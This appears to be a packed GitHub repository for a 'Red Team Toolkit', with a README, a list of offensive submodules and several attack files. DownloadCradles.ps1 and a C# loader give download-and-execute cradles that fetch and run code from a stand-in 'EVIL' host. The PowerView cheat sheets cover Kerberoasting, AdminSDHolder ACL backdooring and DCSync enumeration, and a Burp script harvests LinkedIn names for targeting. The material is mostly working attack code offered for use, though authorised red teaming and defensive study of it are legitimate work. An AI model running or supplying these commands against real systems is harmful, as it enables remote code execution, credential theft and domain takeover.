├── .keep ├── Labs └── .keep ├── Staging └── .keep ├── References ├── .keep ├── DownloadCradles.ps1 ├── PowerView-2.0-tricks.ps1 └── PowerView-3.0-tricks.ps1 ├── Initial_access ├── .keep ├── Phishing │ └── .keep └── DotnetAssemblyDownloadCradle.cs ├── Lateral_movement ├── .keep └── PowerView-with-RemoteAccessPolicyEnumeration.ps1 ├── Reconnaissance ├── .keep └── People │ └── scrape-google-linkedin.burp-python-script.txt ├── Actions_on_objectives └── .keep ├── Command_and_control └── .keep ├── Establish_foothold └── .keep ├── README.md └── .gitmodules /.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Labs/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Staging/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /References/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Initial_access/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Lateral_movement/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Reconnaissance/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Actions_on_objectives/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Command_and_control/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Establish_foothold/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Initial_access/Phishing/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Initial_access/DotnetAssemblyDownloadCradle.cs: -------------------------------------------------------------------------------- 1 | public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Red Team Toolkit 2 | 3 | A collection of tools that aid in red team operations. 4 | 5 | Use 6 | 7 | git clone --recursive 8 | 9 | or if that is too late... 10 | 11 | git submodule update --init --recursive 12 | 13 | 14 | pull requests welcomed 15 | 16 | TODO: Add modules and credits here -------------------------------------------------------------------------------- /Reconnaissance/People/scrape-google-linkedin.burp-python-script.txt: -------------------------------------------------------------------------------- 1 | if not messageIsRequest: 2 | response = messageInfo.getResponse() 3 | analyzedResponse = helpers.analyzeResponse(response) 4 | headerList = analyzedResponse.getHeaders() 5 | bodyStr = helpers.bytesToString(response[analyzedResponse.getBodyOffset():]).encode('ascii','ignore') 6 | if "| Professional Profile - LinkedIn" in bodyStr: 7 | strs = bodyStr.split("| Professional Profile - LinkedIn") 8 | strs.pop(-1) #remove the last item 9 | for str in strs: 10 | try: 11 | name = (str.rsplit("x3e",1)[1]).strip() 12 | except: 13 | x="test" 14 | try: 15 | name = (str.rsplit("\">",1)[1]).strip() 16 | if "=\"" in name: 17 | name = str.rsplit("=\"",1)[1] 18 | if "" in name: 19 | name = (str.rsplit("<title>",1)[1]).strip() 20 | except: 21 | x="test" 22 | print name 23 | if "| LinkedIn" in bodyStr: 24 | strs = bodyStr.split("| LinkedIn") 25 | strs.pop(-1) #remove the last item 26 | for str in strs: 27 | try: 28 | name = (str.rsplit("x3e",1)[1]).strip() 29 | except: 30 | x="test" 31 | try: 32 | name = (str.rsplit("\">",1)[1]).strip() 33 | if "=\"" in name: 34 | name = str.rsplit("=\"",1)[1] 35 | if "<title>" in name: 36 | name = (str.rsplit("<title>",1)[1]).strip() 37 | except: 38 | x="test" 39 | print name 40 | -------------------------------------------------------------------------------- /References/DownloadCradles.ps1: -------------------------------------------------------------------------------- 1 | # normal download cradle 2 | IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") 3 | 4 | # PowerShell 3.0+ 5 | IEX (iwr 'http://EVIL/evil.ps1') 6 | 7 | # hidden IE com object 8 | $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r 9 | 10 | # Msxml2.XMLHTTP COM object 11 | $h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText 12 | 13 | # WinHttp COM object (not proxy aware!) 14 | $h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText 15 | 16 | # using bitstransfer- touches disk! 17 | Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r 18 | 19 | # DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1) 20 | # code to execute needs to be a base64 encoded string stored in a TXT record 21 | IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0])))) 22 | 23 | # from @subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d 24 | <# 25 | <?xml version="1.0"?> 26 | <command> 27 | <a> 28 | <execute>Get-Process</execute> 29 | </a> 30 | </command> 31 | #> 32 | $a = New-Object System.Xml.XmlDocument 33 | $a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt") 34 | $a.command.a.execute | iex 35 | -------------------------------------------------------------------------------- /References/PowerView-2.0-tricks.ps1: -------------------------------------------------------------------------------- 1 | # NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/) 2 | # has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 3 | 4 | # get all the groups a user is effectively a member of, 'recursing up' 5 | Get-NetGroup -UserName <USER> 6 | 7 | # get all the effective members of a group, 'recursing down' 8 | Get-NetGroupMember -GoupName <GROUP> -Recurse 9 | 10 | # get the effective set of users who can administer a server 11 | Get-NetLocalGroup -Recurse SERVER.domain.local 12 | 13 | # retrieve all the computers a GPP password applies to 14 | Get-NetOU -GUID <GPP_GUID> | %{ Get-NetComputer -ADSPath $_ } 15 | 16 | # get all users with passwords changed > 1 year ago 17 | $Date = (Get-Date).AddYears(-1).ToFileTime() 18 | Get-NetUser -Filter "(pwdlastset<=$Date)" 19 | # all enabled users 20 | Get-NetUser -Filter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" 21 | # all disabled users 22 | Get-NetUser -Filter "(userAccountControl:1.2.840.113556.1.4.803:=2)" 23 | # all users that require smart card authentication 24 | Get-NetUser -Filter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)" 25 | # all users that don't require smart card authentication 26 | Get-NetUser -Filter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" 27 | 28 | # enumerate all servers that allow unconstrained delegation, and all users that aren't marked as sensitive/not for delegation 29 | $Computers = Get-NetComputer -Unconstrained 30 | $Users = Get-NetUser -AllowDelegation -AdminCount 31 | 32 | # enumerate servers that allow unconstrained kerberos delegation and show all users logged in 33 | Invoke-UserHunter -Unconstrained -ShowAll 34 | 35 | # hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation 36 | Invoke-UserHunter -Unconstrained -AdminCount -AllowDelegation 37 | 38 | # Get the logged on users for all machines in any *server* OU in a particular domain 39 | Get-NetOU *server* -Domain <domain> | %{Get-NetComputer -ADSPath $_ | %{Get-NetLoggedOn -ComputerName $_}} 40 | 41 | # find all users with an SPN set (likely service accounts) 42 | Get-NetUser -SPN 43 | 44 | # find all service accounts in "Domain Admins" 45 | Get-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'} 46 | 47 | # hunt for all privileged users (adminCount=1) 48 | Invoke-UserHunter -AdminCount 49 | 50 | # find users with sidHistory set 51 | Get-NetUser -Filter '(sidHistory=*)' 52 | 53 | # enumerate all gobal catalogs in the forest 54 | Get-NetForestCatalog 55 | 56 | # turn a list of computer short names to FQDNs 57 | gc computers.txt | % {Get-NetComputer -ADSpath "GC://GLOBAL.CATALOG" -Filter "(name=$_)"} 58 | 59 | # find interesting .vbs/.bat/.ps1 scripts on domain controllers 60 | Invoke-FileFinder -SearchSYSVol 61 | 62 | # enumerate the current domain policy, optionally specifying a domain to query for or a DC to reflect queries through 63 | $DomainPolicy = Get-DomainPolicy [-Domain <DOMAIN>] [-DomainController <DC>] 64 | $DomainPolicy.KerberosPolicy # useful for golden tickets ;) 65 | $DomainPolicy.SystemAccess 66 | 67 | # enumerate the current domain controller policy, resolving SIDs to account names, and seeing who has what rights on DCs by default 68 | $DcPolicy = Get-DomainPolicy -Source DC -ResolveSids 69 | $DcPolicy.PrivilegeRights 70 | 71 | # enumerate what machines that a particular group has local admin rights to 72 | Find-GPOLocation -GroupName <GROUP> 73 | 74 | # enumerate what machines that a given user in the specified domain has RDP access rights to, reflecting queries through a particular DC 75 | Find-GPOLocation -UserName <USER> -Domain <DOMAIN> -DomainController <DC> -LocalGroup RDP 76 | 77 | # export a csv of all GPO mappings 78 | Find-GPOLocation | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv 79 | 80 | # use alternate credentials for searching for files on the domain 81 | $Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force 82 | $Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password) 83 | Invoke-FileFinder -Domain DOMAIN -Credential $Credential 84 | 85 | # enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names 86 | Get-ObjectAcl -SamAccountName matt -Domain testlab.local -ResolveGUIDs 87 | 88 | # grant user 'will' the rights to change 'matt's password 89 | Add-ObjectAcl -TargetSamAccountName matt -PrincipalSamAccountName will -Rights ResetPassword 90 | 91 | # audit the permissions of AdminSDHolder, resolving GUIDs 92 | Get-ObjectACL -ADSPrefix 'CN=AdminSDHolder,CN=System' -ResolveGUIDs 93 | 94 | # backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse 95 | Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName matt -Rights All 96 | 97 | # retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync) 98 | Get-ObjectACL -DistinguishedName "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? { 99 | ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') 100 | } 101 | 102 | # find linked DA accounts using name correlation 103 | Get-NetGroupMember -GroupName "Domain Admins" | %{ Get-NetUser $_.membername } | %{ $a=$_.displayname.split(" ")[0..1] -join " "; Get-NetUser -Filter "(displayname=*$a*)" } | Select-Object -Property displayname,samaccountname 104 | 105 | # save a PowerView object to disk for later usage 106 | Get-NetUser | Export-Clixml user.out 107 | $Users = Import-Clixml user.out 108 | 109 | # Find any machine accounts in privileged groups 110 | Get-NetGroup -AdminCount | Get-NetGroupMember -Recurse | ?{$_.MemberName -like '*$'} 111 | 112 | # Enumerate permissions for GPOs where users have some kind of modify rights 113 | Get-NetGPO | Get-ObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectType -eq 'All') -and ($_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteProperty|CreateChild" )} 114 | 115 | # find all policies applied to a current machine 116 | Get-NetGPO -ComputerName WINDOWS1.testlab.local 117 | 118 | # find the user/groups that have read access to the LAPS password property for a specified computer 119 | Get-NetComputer -ComputerName 'LAPSCLIENT.test.local' -FullData | 120 | Select-Object -ExpandProperty distinguishedname | 121 | ForEach-Object { $_.substring($_.indexof('OU')) } | ForEach-Object { 122 | Get-ObjectAcl -ResolveGUIDs -DistinguishedName $_ 123 | } | Where-Object { 124 | ($_.ObjectType -like 'ms-Mcs-AdmPwd') -and 125 | ($_.ActiveDirectoryRights -match 'ReadProperty') 126 | } | ForEach-Object { 127 | Convert-NameToSid $_.IdentityReference 128 | } | Select-Object -ExpandProperty SID | Get-ADObject 129 | 130 | # get the ACLs for all OUs where someone is allowed to read the LAPS password attribute 131 | Get-NetOU -FullData | 132 | Get-ObjectAcl -ResolveGUIDs | 133 | Where-Object { 134 | ($_.ObjectType -like 'ms-Mcs-AdmPwd') -and 135 | ($_.ActiveDirectoryRights -match 'ReadProperty') 136 | } | ForEach-Object { 137 | $_ | Add-Member NoteProperty 'IdentitySID' $(Convert-NameToSid $_.IdentityReference).SID; 138 | $_ 139 | } 140 | 141 | # perform a user 'zone transfer' by exporting all AD DNS records from all zones, exporting to a .csv 142 | Get-DNSZone | Get-DNSRecord | Export-CSV -NoTypeInformation dns.csv 143 | 144 | # return all universal security groups in a forest with foreign members 145 | Get-NetGroup -Filter '(member=*)(groupType=2147483656)' -ADSPath 'GC://testlab.local' -FullData | Select-Object samaccountname,distinguishedname,member | ForEach-Object { 146 | $GroupDomain = $_.distinguishedname.subString($_.distinguishedname.IndexOf("DC=")) 147 | $_.Member = $_.Member | ForEach-Object { 148 | $MemberDomain = $_.subString($_.IndexOf("DC=")) 149 | if($GroupDomain -ne $MemberDomain) { 150 | $_ 151 | } 152 | } 153 | $_ 154 | } | Where-Object {$_.Member} 155 | -------------------------------------------------------------------------------- /References/PowerView-3.0-tricks.ps1: -------------------------------------------------------------------------------- 1 | # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ 2 | # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c 3 | 4 | # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: 5 | # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 6 | 7 | # New function naming schema: 8 | # Verbs: 9 | # Get : retrieve full raw data sets 10 | # Find : ‘find’ specific data entries in a data set 11 | # Add : add a new object to a destination 12 | # Set : modify a given object 13 | # Invoke : lazy catch-all 14 | # Nouns: 15 | # Verb-Domain* : indicates that LDAP/.NET querying methods are being executed 16 | # Verb-WMI* : indicates that WMI is being used under the hood to execute enumeration 17 | # Verb-Net* : indicates that Win32 API access is being used under the hood 18 | 19 | 20 | # get all the groups a user is effectively a member of, 'recursing up' using tokenGroups 21 | Get-DomainGroup -MemberIdentity <User/Group> 22 | 23 | # get all the effective members of a group, 'recursing down' 24 | Get-DomainGroupMember -Identity "Domain Admins" -Recurse 25 | 26 | # use an alterate creadential for any function 27 | $SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force 28 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 29 | Get-DomainUser -Credential $Cred 30 | 31 | # retrieve all the computer dns host names a GPP password applies to 32 | Get-DomainOU -GPLink '<GPP_GUID>' | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname} 33 | 34 | # get all users with passwords changed > 1 year ago, returning sam account names and password last set times 35 | $Date = (Get-Date).AddYears(-1).ToFileTime() 36 | Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset 37 | 38 | # all enabled users, returning distinguishednames 39 | Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname 40 | Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname 41 | 42 | # all disabled users 43 | Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)" 44 | Get-DomainUser -UACFilter ACCOUNTDISABLE 45 | 46 | # all users that require smart card authentication 47 | Get-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)" 48 | Get-DomainUser -UACFilter SMARTCARD_REQUIRED 49 | 50 | # all users that *don't* require smart card authentication, only returning sam account names 51 | Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname 52 | Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname 53 | 54 | # use multiple identity types for any *-Domain* function 55 | 'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff 56 | 57 | # find all users with an SPN set (likely service accounts) 58 | Get-DomainUser -SPN 59 | 60 | # check for users who don't have kerberos preauthentication set 61 | Get-DomainUser -PreauthNotRequired 62 | Get-DomainUser -UACFilter DONT_REQ_PREAUTH 63 | 64 | # find all service accounts in "Domain Admins" 65 | Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'} 66 | 67 | # find users with sidHistory set 68 | Get-DomainUser -LDAPFilter '(sidHistory=*)' 69 | 70 | # find any users/computers with constrained delegation st 71 | Get-DomainUser -TrustedToAuth 72 | Get-DomainComputer -TrustedToAuth 73 | 74 | # enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for delegation 75 | $Computers = Get-DomainComputer -Unconstrained 76 | $Users = Get-DomainUser -AllowDelegation -AdminCount 77 | 78 | # return the local *groups* of a remote server 79 | Get-NetLocalGroup SERVER.domain.local 80 | 81 | # return the local group *members* of a remote server using Win32 API methods (faster but less info) 82 | Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local 83 | 84 | # Kerberoast any users in a particular OU with SPNs set 85 | Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" 86 | 87 | # Find-DomainUserLocation == old Invoke-UserHunter 88 | # enumerate servers that allow unconstrained Kerberos delegation and show all users logged in 89 | Find-DomainUserLocation -ComputerUnconstrained -ShowAll 90 | 91 | # hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation 92 | Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation 93 | 94 | # find all computers in a given OU 95 | Get-DomainComputer -SearchBase "ldap://OU=..." 96 | 97 | # Get the logged on users for all machines in any *server* OU in a particular domain 98 | Get-DomainOU -Identity *server* -Domain <domain> | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | %{Get-NetLoggedOn -ComputerName $_}} 99 | 100 | # enumerate all gobal catalogs in the forest 101 | Get-ForestGlobalCatalog 102 | 103 | # turn a list of computer short names to FQDNs, using a global catalog 104 | gc computers.txt | % {Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_)" -Properties dnshostname} 105 | 106 | # enumerate the current domain controller policy 107 | $DCPolicy = Get-DomainPolicy -Policy DC 108 | $DCPolicy.PrivilegeRights # user privilege rights on the dc... 109 | 110 | # enumerate the current domain policy 111 | $DomainPolicy = Get-DomainPolicy -Policy Domain 112 | $DomainPolicy.KerberosPolicy # useful for golden tickets ;) 113 | $DomainPolicy.SystemAccess # password age/etc. 114 | 115 | # enumerate what machines that a particular user/group identity has local admin rights to 116 | # Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocation 117 | Get-DomainGPOUserLocalGroupMapping -Identity <User/Group> 118 | 119 | # enumerate what machines that a given user in the specified domain has RDP access rights to 120 | Get-DomainGPOUserLocalGroupMapping -Identity <USER> -Domain <DOMAIN> -LocalGroup RDP 121 | 122 | # export a csv of all GPO mappings 123 | Get-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv 124 | 125 | # use alternate credentials for searching for files on the domain 126 | # Find-InterestingDomainShareFile == old Invoke-FileFinder 127 | $Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force 128 | $Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password) 129 | Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential 130 | 131 | # enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names 132 | Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local 133 | 134 | # grant user 'will' the rights to change 'matt's password 135 | Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose 136 | 137 | # audit the permissions of AdminSDHolder, resolving GUIDs 138 | Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs 139 | 140 | # backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse 141 | Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All 142 | 143 | # retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync) 144 | Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? { 145 | ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') 146 | } 147 | 148 | # find linked DA accounts using name correlation 149 | Get-DomainGroupMember 'Domain Admins' | %{Get-DomainUser $_.membername -LDAPFilter '(displayname=*)'} | %{$a=$_.displayname.split(' ')[0..1] -join ' '; Get-DomainUser -LDAPFilter "(displayname=*$a*)" -Properties displayname,samaccountname} 150 | 151 | # save a PowerView object to disk for later usage 152 | Get-DomainUser | Export-Clixml user.xml 153 | $Users = Import-Clixml user.xml 154 | 155 | # Find any machine accounts in privileged groups 156 | Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} 157 | 158 | # Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights 159 | Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')} 160 | 161 | # find all policies applied to a current machine 162 | Get-DomainGPO -ComputerIdentity windows1.testlab.local 163 | 164 | # enumerate all groups in a domain that don't have a global scope, returning just group names 165 | Get-DomainGroup -GroupScope NotGlobal -Properties name 166 | 167 | # enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships 168 | # query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames 169 | $ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? {$_.objectsid -match '^S-1-5-.*-[1-9]\d{2,}$'} | Select-Object -ExpandProperty distinguishedname 170 | $Domains = @{} 171 | $ForeignMemberships = ForEach($ForeignUser in $ForeignUsers) { 172 | # extract the domain the foreign user was added to 173 | $ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' 174 | # check if we've already enumerated this domain 175 | if (-not $Domains[$ForeignUserDomain]) { 176 | $Domains[$ForeignUserDomain] = $True 177 | # enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set 178 | $Filter = "(|(member=" + $($ForeignUsers -join ")(member=") + "))" 179 | Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member 180 | } 181 | } 182 | $ForeignMemberships | fl 183 | 184 | # if running in -sta mode, impersonate another credential a la "runas /netonly" 185 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 186 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 187 | Invoke-UserImpersonation -Credential $Cred 188 | # ... action 189 | Invoke-RevertToSelf 190 | 191 | # enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the firest result returned by Get-DomainComputer 192 | Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier 193 | 194 | # set the specified property for the given user identity 195 | Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose 196 | 197 | # Set the owner of 'dfm' in the current domain to 'harmj0y' 198 | Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y 199 | 200 | # retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync) 201 | Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? { 202 | ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get') 203 | } 204 | -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "References/Awesome-Red-Teaming"] 2 | path = References/Awesome-Red-Teaming 3 | url = https://github.com/quikilr/Awesome-Red-Teaming.git 4 | [submodule "Labs/AutomatedLab"] 5 | path = Labs/AutomatedLab 6 | url = https://github.com/quikilr/AutomatedLab.git 7 | [submodule "Labs/DetectionLab"] 8 | path = Labs/DetectionLab 9 | url = https://github.com/clong/DetectionLab.git 10 | [submodule "Initial_access/Payload_generation/demiguise"] 11 | path = Initial_access/Payload_generation/demiguise 12 | url = https://github.com/nccgroup/demiguise.git 13 | [submodule "Initial_access/Payload_generation/EmbedInHTML"] 14 | path = Initial_access/Payload_generation/EmbedInHTML 15 | url = https://github.com/Arno0x/EmbedInHTML.git 16 | [submodule "Initial_access/Payload_generation/CACTUSTORCH"] 17 | path = Initial_access/Payload_generation/CACTUSTORCH 18 | url = https://github.com/mdsecactivebreach/CACTUSTORCH.git 19 | [submodule "Initial_access/Payload_generation/morphHTA"] 20 | path = Initial_access/Payload_generation/morphHTA 21 | url = https://github.com/mdsecactivebreach/morphHTA.git 22 | [submodule "Initial_access/Payload_generation/genHTA"] 23 | path = Initial_access/Payload_generation/genHTA 24 | url = https://github.com/mdsecactivebreach/genHTA.git 25 | [submodule "Reconnaissance/People/LinkedInt"] 26 | path = Reconnaissance/People/LinkedInt 27 | url = https://github.com/mdsecactivebreach/LinkedInt.git 28 | [submodule "Initial_access/Federated_services/LyncSniper"] 29 | path = Initial_access/Federated_services/LyncSniper 30 | url = https://github.com/mdsecactivebreach/LyncSniper.git 31 | [submodule "Initial_access/Federated_services/ruler"] 32 | path = Initial_access/Federated_services/ruler 33 | url = https://github.com/sensepost/ruler.git 34 | [submodule "Initial_access/Federated_services/MailSniper"] 35 | path = Initial_access/Federated_services/MailSniper 36 | url = https://github.com/dafthack/MailSniper.git 37 | [submodule "Initial_access/Targeting/EmailAddressMangler"] 38 | path = Initial_access/Targeting/EmailAddressMangler 39 | url = https://github.com/dafthack/EmailAddressMangler.git 40 | [submodule "Initial_access/Targeting/statistically-likely-usernames"] 41 | path = Initial_access/Targeting/statistically-likely-usernames 42 | url = https://github.com/insidetrust/statistically-likely-usernames.git 43 | [submodule "Initial_access/Payload_generation/GreatSCT"] 44 | path = Initial_access/Payload_generation/GreatSCT 45 | url = https://github.com/GreatSCT/GreatSCT.git 46 | [submodule "Initial_access/Payload_generation/Office-DDE-Payloads"] 47 | path = Initial_access/Payload_generation/Office-DDE-Payloads 48 | url = https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads.git 49 | [submodule "Initial_access/Payload_generation/unicorn"] 50 | path = Initial_access/Payload_generation/unicorn 51 | url = https://github.com/trustedsec/unicorn.git 52 | [submodule "Staging/Chameleon"] 53 | path = Staging/Chameleon 54 | url = https://github.com/mdsecactivebreach/Chameleon.git 55 | [submodule "Staging/domainhunter"] 56 | path = Staging/domainhunter 57 | url = https://github.com/threatexpress/domainhunter.git 58 | [submodule "Staging/FindFrontableDomains"] 59 | path = Staging/FindFrontableDomains 60 | url = https://github.com/rvrsh3ll/FindFrontableDomains.git 61 | [submodule "References/CheatSheets"] 62 | path = References/CheatSheets 63 | url = https://github.com/HarmJ0y/CheatSheets.git 64 | [submodule "Lateral_movement/PowerSploit"] 65 | path = Lateral_movement/PowerSploit 66 | url = https://github.com/PowerShellMafia/PowerSploit/ 67 | [submodule "Lateral_movement/BloodHound"] 68 | path = Lateral_movement/BloodHound 69 | url = https://github.com/BloodHoundAD/BloodHound.git 70 | [submodule "Lateral_movement/Inveigh"] 71 | path = Lateral_movement/Inveigh 72 | url = https://github.com/Kevin-Robertson/Inveigh.git 73 | [submodule "Lateral_movement/nishang"] 74 | path = Lateral_movement/nishang 75 | url = https://github.com/samratashok/nishang.git 76 | [submodule "Lateral_movement/PowerUpSQL"] 77 | path = Lateral_movement/PowerUpSQL 78 | url = https://github.com/NetSPI/PowerUpSQL.git 79 | [submodule "Lateral_movement/SessionGopher"] 80 | path = Lateral_movement/SessionGopher 81 | url = https://github.com/fireeye/SessionGopher.git 82 | [submodule "Lateral_movement/Misc-PowerShell-Stuff"] 83 | path = Lateral_movement/Misc-PowerShell-Stuff 84 | url = https://github.com/enigma0x3/Misc-PowerShell-Stuff.git 85 | [submodule "Initial_access/subTee-gits-backups"] 86 | path = Initial_access/subTee-gits-backups 87 | url = https://github.com/re4lity/subTee-gits-backups.git 88 | [submodule "Reconnaissance/People/raven"] 89 | path = Reconnaissance/People/raven 90 | url = https://github.com/0x09AL/raven.git 91 | [submodule "Reconnaissance/People/PyHunter"] 92 | path = Reconnaissance/People/PyHunter 93 | url = https://github.com/VonStruddle/PyHunter.git 94 | [submodule "Reconnaissance/Technology/DNS/Anubis"] 95 | path = Reconnaissance/Technology/DNS/Anubis 96 | url = https://github.com/jonluca/Anubis.git 97 | [submodule "Reconnaissance/Technology/DNS/blacksheepwall"] 98 | path = Reconnaissance/Technology/DNS/blacksheepwall 99 | url = https://github.com/tomsteele/blacksheepwall.git 100 | [submodule "Reconnaissance/Technology/DNS/dnscan"] 101 | path = Reconnaissance/Technology/DNS/dnscan 102 | url = https://github.com/rbsec/dnscan.git 103 | [submodule "Reconnaissance/Technology/DNS/Sublist3r"] 104 | path = Reconnaissance/Technology/DNS/Sublist3r 105 | url = https://github.com/aboul3la/Sublist3r.git 106 | [submodule "Initial_access/Payload_generation/Invoke-CradleCrafter"] 107 | path = Initial_access/Payload_generation/Invoke-CradleCrafter 108 | url = 